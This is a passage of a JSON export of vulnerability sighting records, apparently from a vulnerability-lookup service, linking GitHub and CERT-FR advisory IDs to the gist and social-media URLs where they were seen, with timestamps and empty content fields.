"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rwp7-7vc6-8477", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114281067875557615", "content": "", "creation_timestamp": "2025-04-04T18:18:29.376112Z"}, {"uuid": "37db653a-76a1-4e68-9a1b-7e1c1140ebc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/6b188f32f9a4f14d0c91b7a5e40b8750", "content": "", "creation_timestamp": "2025-07-16T05:46:19.000000Z"}, {"uuid": "a5a1fed9-d20c-4738-87f6-895cf66901a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/6b188f32f9a4f14d0c91b7a5e40b8750", "content": "", "creation_timestamp": "2025-07-16T05:46:19.000000Z"}, {"uuid": "5311925e-7059-47bd-b798-23fc5b2866f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/6b188f32f9a4f14d0c91b7a5e40b8750", "content": "", "creation_timestamp": "2025-07-16T05:46:19.000000Z"}, {"uuid": "6e25361a-6235-43a4-893d-9e354e5f0b25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/f76284df55f000581483f5063f777b7d", "content": "", "creation_timestamp": "2025-07-16T09:42:22.000000Z"}, {"uuid": "ea8d80b5-6f78-4cdb-a71e-d9034ba90b52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/f0f0644035388c4aef8604733b503de6", "content": "", "creation_timestamp": "2025-07-16T11:38:23.000000Z"}, {"uuid": "9a50dc64-cb98-4000-85a1-42e4a8325810", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/f0f0644035388c4aef8604733b503de6", "content": "", "creation_timestamp": "2025-07-16T11:38:23.000000Z"}, {"uuid": "59218efe-0d84-43a2-ad24-4400c4add33e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/f0f0644035388c4aef8604733b503de6", "content": "", "creation_timestamp": "2025-07-16T11:38:23.000000Z"}, {"uuid": "0f94946e-a013-4b4e-a098-4613d87ec3a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/c4c64c45764712e3ac0ba621c5518451", "content": "", "creation_timestamp": "2025-07-16T14:31:41.000000Z"}, {"uuid": "bccb3d5c-b7f5-466c-86c7-17ca16d2e68a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/8b90b57146ec5c67bab7a2c865fdd98a", "content": "", "creation_timestamp": "2025-07-16T14:39:43.000000Z"}, {"uuid": "b8033435-9f11-4725-9f29-9529e250a8fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/361d39b7c651551c070b03a701087903", "content": "", "creation_timestamp": "2025-07-16T14:44:41.000000Z"}, {"uuid": "665bbc95-c106-4275-9c89-776479d39eda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/361d39b7c651551c070b03a701087903", "content": "", "creation_timestamp": "2025-07-16T14:44:41.000000Z"}, {"uuid": "86218123-ac8e-4e94-aef0-31d58f065f28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/361d39b7c651551c070b03a701087903", "content": "", "creation_timestamp": "2025-07-16T14:44:41.000000Z"}, {"uuid": "8f5f8414-c139-4476-a33c-17a4ec0bebef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/361d39b7c651551c070b03a701087903", "content": "", "creation_timestamp": "2025-07-16T14:44:41.000000Z"}, {"uuid": "25c093d2-3b88-430d-88f1-2c1039148c06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-008", "type": "seen", "source": "https://bsky.app/profile/cti-news.bsky.social/post/3lqugnmb2rk2r", "content": "", "creation_timestamp": "2025-06-05T13:33:03.708275Z"}, {"uuid": "765cc2a6-fd3c-444f-bc50-4c042bcbb7fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-028", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3ltfcawvutw2r", "content": "", "creation_timestamp": "2025-07-07T17:20:06.805434Z"}, {"uuid": "17db0359-702e-43de-87cb-eaff564e9970", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/9c72b31f170be53ac077b716bfd00955", "content": "", "creation_timestamp": "2025-07-16T05:45:14.000000Z"}, {"uuid": "b5ab7cdd-9999-49fc-8205-1a9f833bccfc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcwr-x25h-x5fh", "type": "seen", "source": "https://gist.github.com/safer-bot/9c72b31f170be53ac077b716bfd00955", "content": "", "creation_timestamp": "2025-07-16T05:45:14.000000Z"}, {"uuid": "83d5b583-bf51-4501-b39f-c985620ce4a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vrpq-qp53-qv56", "type": "seen", "source": "https://gist.github.com/safer-bot/9c72b31f170be53ac077b716bfd00955", "content": "", "creation_timestamp": "2025-07-16T05:45:14.000000Z"}, {"uuid": "779c60b0-b1a9-4596-8fc5-ebef507da5ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/9c72b31f170be53ac077b716bfd00955", "content": "", "creation_timestamp": "2025-07-16T05:45:14.000000Z"}, {"uuid": "2a061dcd-41f6-47ae-9c74-c5e8fb61a1ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g6ph-x5wf-g337", "type": "seen", "source": "https://gist.github.com/safer-bot/9c72b31f170be53ac077b716bfd00955", "content": "", "creation_timestamp": "2025-07-16T05:45:14.000000Z"}, {"uuid": "d40c0c1c-5928-43e9-8fd9-091036dd1207", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/9c72b31f170be53ac077b716bfd00955", "content": "", "creation_timestamp": "2025-07-16T05:45:14.000000Z"}, {"uuid": "7da70615-1d20-46e6-a098-c7da1ed56c3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/9c72b31f170be53ac077b716bfd00955", "content": "", "creation_timestamp": "2025-07-16T05:45:14.000000Z"}, {"uuid": "ecc73248-063a-412e-8d45-b31d2debc0cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/9c72b31f170be53ac077b716bfd00955", "content": "", "creation_timestamp": "2025-07-16T05:45:14.000000Z"}, {"uuid": "a02a17ff-35d1-4b2b-a819-fe45f1cc66c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhgr-952r-6p8q", "type": "seen", "source": "https://gist.github.com/safer-bot/9c72b31f170be53ac077b716bfd00955", "content": "", "creation_timestamp": "2025-07-16T05:45:14.000000Z"}, {"uuid": "99d5b26c-5ef7-458a-a209-ba6702c196a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2f88-5hg8-9x2x", "type": "seen", "source": "https://gist.github.com/safer-bot/9c72b31f170be53ac077b716bfd00955", "content": "", "creation_timestamp": "2025-07-16T05:45:14.000000Z"}, {"uuid": "2245e1a9-e3ef-4a5c-b235-dec0cb5f2ec0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/239ee9e594acea2838b75ea9551d1dd2", "content": "", "creation_timestamp": "2025-07-16T09:45:57.000000Z"}, {"uuid": "42468292-e4be-44fe-83ab-cea0192dd597", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/239ee9e594acea2838b75ea9551d1dd2", "content": "", "creation_timestamp": "2025-07-16T09:45:57.000000Z"}, {"uuid": "afa6ba12-5a87-40e6-8209-4d07fb186b44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-668q-qrv7-99fm", "type": "seen", "source": "https://gist.github.com/safer-bot/239ee9e594acea2838b75ea9551d1dd2", "content": "", "creation_timestamp": "2025-07-16T09:45:57.000000Z"}, {"uuid": "96944127-e42a-4e6a-b4b7-8f20f322f23b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m72m-mhq2-9p6c", "type": "seen", "source": "https://gist.github.com/safer-bot/239ee9e594acea2838b75ea9551d1dd2", "content": "", "creation_timestamp": "2025-07-16T09:45:57.000000Z"}, {"uuid": "710e05eb-f4c2-4bb3-b580-45650dd06c06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/239ee9e594acea2838b75ea9551d1dd2", "content": "", "creation_timestamp": "2025-07-16T09:45:57.000000Z"}, {"uuid": "1b152626-268e-4564-ba61-3eee408a1856", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/239ee9e594acea2838b75ea9551d1dd2", "content": "", "creation_timestamp": "2025-07-16T09:45:57.000000Z"}, {"uuid": "3fa4eee4-6e03-4b9b-8538-be23d411ab3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gp7f-rwcx-9369", "type": "seen", "source": "https://gist.github.com/safer-bot/239ee9e594acea2838b75ea9551d1dd2", "content": "", "creation_timestamp": "2025-07-16T09:45:57.000000Z"}, {"uuid": "f26b77d4-6ae9-4ab0-9a95-4fb35f011268", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/f0f0644035388c4aef8604733b503de6", "content": "", "creation_timestamp": "2025-07-16T11:38:23.000000Z"}, {"uuid": "392d0f2d-70d5-4432-9d13-8edc102adde7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f82v-jwr5-mffw", "type": "seen", "source": "https://gist.github.com/drfuzzyness/483a6222131a72c3cb36595658f8c610", "content": "", "creation_timestamp": "2025-04-05T18:05:21.000000Z"}, {"uuid": "f9eeacdb-b8f2-4a98-b0c6-bfc272d7cfac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wr2q-46pg-f228", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114772677323937430", "content": "", "creation_timestamp": "2025-06-30T14:01:14.088689Z"}, {"uuid": "2e07ee2f-0209-4846-b5ee-7013c72eb1f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/49792c174909f45186330e4625136a56", "content": "", "creation_timestamp": "2025-07-16T06:07:48.000000Z"}, {"uuid": "12aede62-d863-4b1b-997a-b22ac6689c2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-668q-qrv7-99fm", "type": "seen", "source": "https://gist.github.com/safer-bot/49792c174909f45186330e4625136a56", "content": "", "creation_timestamp": "2025-07-16T06:07:48.000000Z"}, {"uuid": "3ab9f945-6c51-4857-bb3a-558eb9dc0272", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/7e07e93d11e05f19d9482e1d0c25aa12", "content": "", "creation_timestamp": "2025-07-16T11:47:25.000000Z"}, {"uuid": "f15f57be-5de0-4579-808f-4ef8cd47e8ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/7e07e93d11e05f19d9482e1d0c25aa12", "content": "", "creation_timestamp": "2025-07-16T11:47:25.000000Z"}, {"uuid": "18c5a412-9145-47e9-862d-63261b15ef7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gmg8-593g-7mv3", "type": "seen", "source": "https://gist.github.com/safer-bot/7e07e93d11e05f19d9482e1d0c25aa12", "content": "", "creation_timestamp": "2025-07-16T11:47:25.000000Z"}, {"uuid": "c3c21321-3080-41f9-b705-5d5986c0c6bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/3815934410df30c04b7a1dba5b8d2ead", "content": "", "creation_timestamp": "2025-07-16T13:02:55.000000Z"}, {"uuid": "dd5c5949-a32b-4055-932c-4651251a14d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/3815934410df30c04b7a1dba5b8d2ead", "content": "", "creation_timestamp": "2025-07-16T13:02:55.000000Z"}, {"uuid": "2130fd68-3377-4a2c-b81e-0aed7ab3540d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/9bba59f11acbede980eca69fe6dd3220", "content": "", "creation_timestamp": "2025-07-16T13:01:38.000000Z"}, {"uuid": "5f188e28-1577-4670-bf97-b6d2bfcd7c99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/1915b7b93f8ad1ca501373e767521f49", "content": "", "creation_timestamp": "2025-07-16T13:56:02.000000Z"}, {"uuid": "47e77a54-9425-4407-8837-02c891aa879f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/cristovao-n/9aa653af34ad282e58b23f7acc6da971", "content": "", "creation_timestamp": "2025-06-14T03:09:34.000000Z"}, {"uuid": "11cc74ce-1901-446a-b53c-37bd2136d650", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8qw-mgjx-rwjr", "type": "seen", "source": "https://mastodon.bsd.cafe/users/winterschon/statuses/114693639525848515", "content": "", "creation_timestamp": "2025-06-16T19:47:13.806330Z"}, {"uuid": "39b1a08e-de6c-4208-967b-a8de4d30016a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/49792c174909f45186330e4625136a56", "content": "", "creation_timestamp": "2025-07-16T06:07:48.000000Z"}, {"uuid": "98a71e9e-0e85-4035-930b-f5539ea627d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/49792c174909f45186330e4625136a56", "content": "", "creation_timestamp": "2025-07-16T06:07:48.000000Z"}, {"uuid": "75f1649e-b8c2-490b-a2f6-34ef461f4d7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/76f63c635db1f22c29c431efd3dc847b", "content": "", "creation_timestamp": "2025-06-16T19:47:05.000000Z"}, {"uuid": "240ccb8a-1eae-4ad0-8db2-91f94e785418", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/76f63c635db1f22c29c431efd3dc847b", "content": "", "creation_timestamp": "2025-06-16T19:47:05.000000Z"}, {"uuid": "96296a03-eb6c-4e22-9b52-844509a9c644", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4p4p-vq2v-9489", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/114813646081481340", "content": "", "creation_timestamp": "2025-07-07T19:40:08.724000Z"}, {"uuid": "10b035eb-4602-4420-ab61-f3daa683b652", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/49792c174909f45186330e4625136a56", "content": "", "creation_timestamp": "2025-07-16T06:07:48.000000Z"}, {"uuid": "979a9275-982e-4878-891c-36a364bcb203", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/49792c174909f45186330e4625136a56", "content": "", "creation_timestamp": "2025-07-16T06:07:48.000000Z"}, {"uuid": "3e044a5f-90dd-4e19-a44b-d4e304393242", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gw85-4gmf-m7rh", "type": "seen", "source": "https://gist.github.com/safer-bot/19a3375ea686e5b598d04878dfb53d86", "content": "", "creation_timestamp": "2025-07-16T09:53:00.000000Z"}, {"uuid": "5a109595-6263-4b21-80f7-de3be5d0dc08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/19a3375ea686e5b598d04878dfb53d86", "content": "", "creation_timestamp": "2025-07-16T09:53:00.000000Z"}, {"uuid": "ebc67d02-c516-46de-8a9d-29ab92334a65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fmj5-wv96-r2ch", "type": "seen", "source": "https://gist.github.com/safer-bot/19a3375ea686e5b598d04878dfb53d86", "content": "", "creation_timestamp": "2025-07-16T09:53:00.000000Z"}, {"uuid": "60083c0a-0f1b-4662-aece-aac9078d15aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/141dc1328181c42e1833c72bce4698d3", "content": "", "creation_timestamp": "2025-07-16T11:50:02.000000Z"}, {"uuid": "db21e946-3805-4958-8aa4-e48a9eacfd82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/8c47b402d6631b794a934f4b18fd9720", "content": "", "creation_timestamp": "2025-06-14T04:07:22.000000Z"}, {"uuid": "7d4bd24c-de70-4d60-852a-aea530bf9620", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-599f-7c49-w659", "type": "seen", "source": "https://gist.github.com/safer-bot/68f4b89b600c072a0eedff4a29cfe91a", "content": "", "creation_timestamp": "2025-07-16T06:08:19.000000Z"}, {"uuid": "beb3c78b-78a6-41a6-a5e3-38cd1487f59f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wxr5-93ph-8wr9", "type": "seen", "source": "https://gist.github.com/safer-bot/68f4b89b600c072a0eedff4a29cfe91a", "content": "", "creation_timestamp": "2025-07-16T06:08:19.000000Z"}, {"uuid": "350ede53-a659-46aa-91ef-386db19f016b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6phf-73q6-gh87", "type": "seen", "source": "https://gist.github.com/safer-bot/68f4b89b600c072a0eedff4a29cfe91a", "content": "", "creation_timestamp": "2025-07-16T06:08:19.000000Z"}, {"uuid": "412d9652-ae72-4dd4-bbda-53e065f25f82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/68f4b89b600c072a0eedff4a29cfe91a", "content": "", "creation_timestamp": "2025-07-16T06:08:19.000000Z"}, {"uuid": "9dba92f1-7aae-4a75-96b1-18de9d6053ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p66x-2cv9-qq3v", "type": "seen", "source": "https://gist.github.com/safer-bot/68f4b89b600c072a0eedff4a29cfe91a", "content": "", "creation_timestamp": "2025-07-16T06:08:19.000000Z"}, {"uuid": "0f7ccd29-6cd7-4c81-b97e-97dab589a457", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/68f4b89b600c072a0eedff4a29cfe91a", "content": "", "creation_timestamp": "2025-07-16T06:08:19.000000Z"}, {"uuid": "3e600016-da21-48eb-9498-ee0c10c6e928", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cfh5-3ghh-wfjx", "type": "seen", "source": "https://gist.github.com/safer-bot/19a3375ea686e5b598d04878dfb53d86", "content": "", "creation_timestamp": "2025-07-16T09:53:00.000000Z"}, {"uuid": "2172431a-80d4-4edb-b0f1-90a418ff3cf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7r82-7xv7-xcpj", "type": "seen", "source": "https://gist.github.com/safer-bot/19a3375ea686e5b598d04878dfb53d86", "content": "", "creation_timestamp": "2025-07-16T09:53:00.000000Z"}, {"uuid": "28effc1c-f1ca-4f54-a454-eecc8f588a2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wf8f-6423-gfxg", "type": "seen", "source": "https://gist.github.com/safer-bot/19a3375ea686e5b598d04878dfb53d86", "content": "", "creation_timestamp": "2025-07-16T09:53:00.000000Z"}, {"uuid": "9695360f-2cef-4677-b171-e752dce7033e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/4e4c49aa91979c33a80a1c0408ee55df", "content": "", "creation_timestamp": "2025-07-16T11:50:34.000000Z"}, {"uuid": "9373f44e-d7de-4306-81e2-7c5b01f82a2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jr6h-r7vg-f9mc", "type": "seen", "source": "https://gist.github.com/safer-bot/4e4c49aa91979c33a80a1c0408ee55df", "content": "", "creation_timestamp": "2025-07-16T11:50:34.000000Z"}, {"uuid": "f3e5ab7b-42d4-44e9-bc2c-4f2ebf19651c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/4e4c49aa91979c33a80a1c0408ee55df", "content": "", "creation_timestamp": "2025-07-16T11:50:34.000000Z"}, {"uuid": 